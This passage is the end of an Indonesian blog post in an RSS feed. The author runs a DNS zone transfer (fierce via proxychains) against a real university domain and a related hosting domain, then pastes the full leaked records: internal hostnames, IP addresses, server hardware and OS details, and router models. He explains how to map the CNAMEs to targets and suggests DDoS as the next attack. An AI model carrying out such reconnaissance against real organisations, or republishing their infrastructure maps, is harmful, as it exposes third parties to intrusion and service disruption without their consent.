mailserver.dinus.ac.id.	86400	IN	TXT	"MailServer Utama"
maps.dinus.ac.id.	86400	IN	CNAME	go.domains.live.com.
mcollege.dinus.ac.id.	86400	IN	CNAME	webhost.dinustech.com.
mhs.dinus.ac.id.	86400	IN	MX	32 mailserver.dinus.ac.id.
milis.dinus.ac.id.	86400	IN	MX	24 mailserver.dinus.ac.id.
milisarchive.dinus.ac.id.	86400	IN	CNAME	mailserver.dinus.ac.id.
mobile.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
ns1.dinus.ac.id.	86400	IN	A	103.246.107.10
ns1.dinus.ac.id.	86400	IN	HINFO	"iPIV-2GHz/1024MB" "Linux"
ns1.dinus.ac.id.	86400	IN	TXT	"NS Server Utama"
ns2.dinus.ac.id.	86400	IN	A	103.246.107.67
ns2.dinus.ac.id.	86400	IN	HINFO	"iP-Xeon-1.8GHz/2G" "Linux"
ns2.dinus.ac.id.	86400	IN	TXT	"NS1 DiNusTech"
ns3.dinus.ac.id.	86400	IN	A	103.246.107.15
ns3.dinus.ac.id.	86400	IN	HINFO	"iPII-400MHz/192MB" "Linux"
ns3.dinus.ac.id.	86400	IN	TXT	"Name Server 3"
ns4.dinus.ac.id.	86400	IN	A	66.252.5.14
paguyuban-rayon1.dinus.ac.id.	86400	IN	CNAME	hostingserver1.dinustech.net.
pascasarjana.dinus.ac.id.	86400	IN	A	103.246.107.35
phki.dinus.ac.id.	86400	IN	CNAME	webhost.dinustech.com.
photos.dinus.ac.id.	86400	IN	CNAME	go.domains.live.com.
pinguin.dinus.ac.id.	86400	IN	A	103.246.107.62
pinguin.dinus.ac.id.	86400	IN	HINFO	"VPServer" "WhiteTea"
pinguin.dinus.ac.id.	86400	IN	TXT	"Pinguin FOSS Repository - by DOSCOM"
pmb.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
poli.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
ppd.dinus.ac.id.	86400	IN	CNAME	webserver.dinustech.com.
pps.dinus.ac.id.	86400	IN	A	103.246.107.35
pps.dinus.ac.id.	86400	IN	HINFO	"iP-Xeon-2GHz/2G" "Linux"
pps.dinus.ac.id.	86400	IN	TXT	"Server Pasca Sarjana"
pps.dinus.ac.id.	86400	IN	MX	30 mailserver.dinus.ac.id.
elearning.pps.dinus.ac.id.	86400	IN	CNAME	pascasarjana.dinus.ac.id.
research.pps.dinus.ac.id.	86400	IN	CNAME	pascasarjana.dinus.ac.id.
riset.pps.dinus.ac.id.	86400	IN	CNAME	pascasarjana.dinus.ac.id.
scele.pps.dinus.ac.id.	86400	IN	CNAME	pascasarjana.dinus.ac.id.
siadin.pps.dinus.ac.id.	86400	IN	CNAME	pascasarjana.dinus.ac.id.
pps2.dinus.ac.id.	86400	IN	CNAME	pascasarjana.dinus.ac.id.
profile.dinus.ac.id.	86400	IN	CNAME	go.domains.live.com.
proxy.dinus.ac.id.	86400	IN	A	103.246.107.37
proxy.dinus.ac.id.	86400	IN	HINFO	"iPXeonQuadCore-2GHz/2048MB" "Linux"
proxy.dinus.ac.id.	86400	IN	TXT	"Proxy Utama"
psi.dinus.ac.id.	86400	IN	A	103.246.107.34
psi.dinus.ac.id.	86400	IN	MX	34 mailserver.dinus.ac.id.
public.dinus.ac.id.	86400	IN	MX	60 sitemail.everyone.net.
riset.dinus.ac.id.	86400	IN	MX	21 mailserver.dinus.ac.id.
router.dinus.ac.id.	86400	IN	A	103.246.107.2
router.dinus.ac.id.	86400	IN	HINFO	"Mikrotik" "RB1100"
router.dinus.ac.id.	86400	IN	TXT	"Router Universitas"
router-utama.dinus.ac.id.	86400	IN	A	103.246.107.1
router-utama.dinus.ac.id.	86400	IN	HINFO	"Mikrotik" "MT"
router-utama.dinus.ac.id.	86400	IN	TXT	"PC-RouterOS - Router Utama"
search.dinus.ac.id.	86400	IN	CNAME	csearch.everyone.net.
semnas-fbs.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
siadin.dinus.ac.id.	86400	IN	CNAME	webpsi.dinus.ac.id.
siakad.dinus.ac.id.	86400	IN	CNAME	webpsi.dinus.ac.id.
silih.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
simpeg.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
skydrive.dinus.ac.id.	86400	IN	CNAME	go.domains.live.com.
staff.dinus.ac.id.	86400	IN	MX	23 mailserver.dinus.ac.id.
streaming.dinus.ac.id.	86400	IN	A	103.246.107.61
streaming.dinus.ac.id.	86400	IN	HINFO	"iPIV-2800MHz/3GB" "M$ Windows"
streaming.dinus.ac.id.	86400	IN	TXT	"Server Streaming TVKU"
svn.dinus.ac.id.	86400	IN	CNAME	webserver.dinustech.com.
tvku.dinus.ac.id.	86400	IN	MX	33 mailserver.dinus.ac.id.
ukm.dinus.ac.id.	86400	IN	A	103.246.107.34
ukm.dinus.ac.id.	86400	IN	MX	31 mailserver.dinus.ac.id.
vc1.dinus.ac.id.	86400	IN	A	103.246.107.60
vc1.dinus.ac.id.	86400	IN	HINFO	"Mikrotik" "MT"
vc1.dinus.ac.id.	86400	IN	TXT	"RouterOS"
vicon1.dinus.ac.id.	86400	IN	A	103.246.107.60
vpn.dinus.ac.id.	86400	IN	CNAME	vc1.dinus.ac.id.
webmail.dinus.ac.id.	86400	IN	CNAME	mailserver.dinus.ac.id.
webmail2.dinus.ac.id.	86400	IN	CNAME	webpsi.dinus.ac.id.
webmail3.dinus.ac.id.	86400	IN	CNAME	webpsi.dinus.ac.id.
webmail4.dinus.ac.id.	86400	IN	CNAME	webpsi.dinus.ac.id.
webmail5.dinus.ac.id.	86400	IN	CNAME	webpsi.dinus.ac.id.
webpsi.dinus.ac.id.	86400	IN	A	103.246.107.33
webpsi.dinus.ac.id.	86400	IN	HINFO	"iPXeon-X5670-2930MHz/32GB" "Linux"
webpsi.dinus.ac.id.	86400	IN	TXT	"Sistem Informasi Akademik - PSI"
webserver.dinus.ac.id.	86400	IN	A	103.246.107.34
webserver.dinus.ac.id.	86400	IN	HINFO	"iPDualCore-3GHz/1024MB" "Linux"
webserver.dinus.ac.id.	86400	IN	TXT	"WebServer Utama"
www.dinus.ac.id.	86400	IN	CNAME	dinus.ac.id.

There isn't much point continuing, you have everything.
Have a nice day.
Exiting...
</pre>
<p>nah, keliatan jelas kan, ini akibat misconfiguration di server DNS, sehingga mapping server terlihat semua.</p>
<p>oke kita bahas salah satu, karena ngurutin mapping dns itu simple.</p>
<pre class="brush: plain">
admin.dinus.ac.id.	86400	IN	CNAME	webserver.dinustech.com.
</pre>
<p><strong>CNAME</strong> ke <strong>webserver.dinustech.com</strong>, so kita cari hasil dari NS query di <strong>webserver.dinustech.com</strong>, dalam kasus ini kita fierce lagi domain baru yaitu dinustech.com</p>
<pre class="brush: shell">root@bt:/pentest/enumeration/dns/fierce# proxychains perl fierce.pl -dns dinustech.com
ProxyChains-3.1 (http://proxychains.sf.net)
DNS Servers for dinustech.com:
	ns3.dinustech.net
	ns2.dinustech.net
	ns1.dinustech.net
	ns4.dinustech.net

Trying zone transfer first...
	Testing ns3.dinustech.net
		Request timed out or transfer not allowed.
	Testing ns2.dinustech.net

Whoah, it worked - misconfigured DNS server found:
dinustech.com.	86400	IN	SOA	ns1.dinustech.net. admin.dinustech.net. (
					2012011741	; Serial
					10800	; Refresh
					3600	; Retry
					604800	; Expire
					86400 )	; Minimum TTL
dinustech.com.	86400	IN	MX	10 mailserver.dinustech.com.
dinustech.com.	86400	IN	NS	ns1.dinustech.net.
dinustech.com.	86400	IN	NS	ns2.dinustech.net.
dinustech.com.	86400	IN	NS	ns3.dinustech.net.
dinustech.com.	86400	IN	NS	ns4.dinustech.net.
dinustech.com.	86400	IN	A	103.246.107.66
blocked.dinustech.com.	86400	IN	CNAME	webserver.dinustech.com.
demomdl.dinustech.com.	86400	IN	CNAME	webhost.dinustech.com.
domreg.dinustech.com.	86400	IN	RP	admin.dinustech.net. bhian.dinustech.net.
domreg.dinustech.com.	86400	IN	A	67.15.47.4
hotspot.dinustech.com.	86400	IN	CNAME	webserver.dinustech.com.
isp.dinustech.com.	86400	IN	CNAME	webserver.dinustech.com.
localhost.dinustech.com.	86400	IN	A	127.0.0.1
mail.dinustech.com.	86400	IN	CNAME	mailserver.dinustech.com.
mailserver.dinustech.com.	86400	IN	A	103.246.107.36
noc.dinustech.com.	86400	IN	CNAME	webserver.dinustech.com.
ntt-trial.dinustech.com.	86400	IN	CNAME	webhost.dinustech.com.
poltekkes.dinustech.com.	86400	IN	A	103.246.107.94
ppdsmg.dinustech.com.	86400	IN	CNAME	webserver.dinus.ac.id.
svn.dinustech.com.	86400	IN	CNAME	webserver.dinustech.com.
vps.dinustech.com.	86400	IN	A	183.91.86.249
webhost.dinustech.com.	86400	IN	A	103.246.107.67
webserver.dinustech.com.	86400	IN	A	103.246.107.66
www.dinustech.com.	86400	IN	CNAME	webserver.dinus.ac.id.

There isn't much point continuing, you have everything.
Have a nice day.
Exiting...
</pre>
<p>sip keliatan jelas bahwa ip server dari <strong>webserver.dinustech.com</strong> ialah alias dari <strong>103.246.107.66</strong>, so kita bisa urutin sebagai berikut :</p>
<pre class="brush: plain">
admin.dinus.ac.id.	86400	IN	CNAME	webserver.dinustech.com.
webserver.dinustech.com.	86400	IN	A	103.246.107.66
</pre>
<p>lalu apa beda nya sama ping? jelas beda, dengan melakukan scanning DNS kita bisa dapat banyak target dan sistem dan mapping network target, karena ping hanya mengeluarkan ip saja, tidak ada output selain touch time, contoh output bonus :</p>
<pre class="brush: plain">
webpsi.dinus.ac.id.	86400	IN	A	103.246.107.33
webpsi.dinus.ac.id.	86400	IN	HINFO	"iPXeon-X5670-2930MHz/32GB" "Linux"
webpsi.dinus.ac.id.	86400	IN	TXT	"Sistem Informasi Akademik - PSI"

----------8<------snip

streaming.dinus.ac.id.	86400	IN	A	103.246.107.61
streaming.dinus.ac.id.	86400	IN	HINFO	"iPIV-2800MHz/3GB" "M$ Windows"
streaming.dinus.ac.id.	86400	IN	TXT	"Server Streaming TVKU"

----------8<------snip

proxy.dinus.ac.id.	86400	IN	A	103.246.107.37
proxy.dinus.ac.id.	86400	IN	HINFO	"iPXeonQuadCore-2GHz/2048MB" "Linux"
proxy.dinus.ac.id.	86400	IN	TXT	"Proxy Utama"
</pre>
<p>etc..</p>
<p>well tipe serangan lanjutan dari dns mapping / scanning ialah DDOS / membuat salah satu dari struktur network target lumpuh, sehingga bisa menyebabkan keseluruhan / salah satu service web bisa mati.</p>
<p>Good Luck! ;p</p>
]]></content:encoded>
			<wfw:commentRss>http://ray16.info/~me/?feed=rss2&#038;p=1214</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

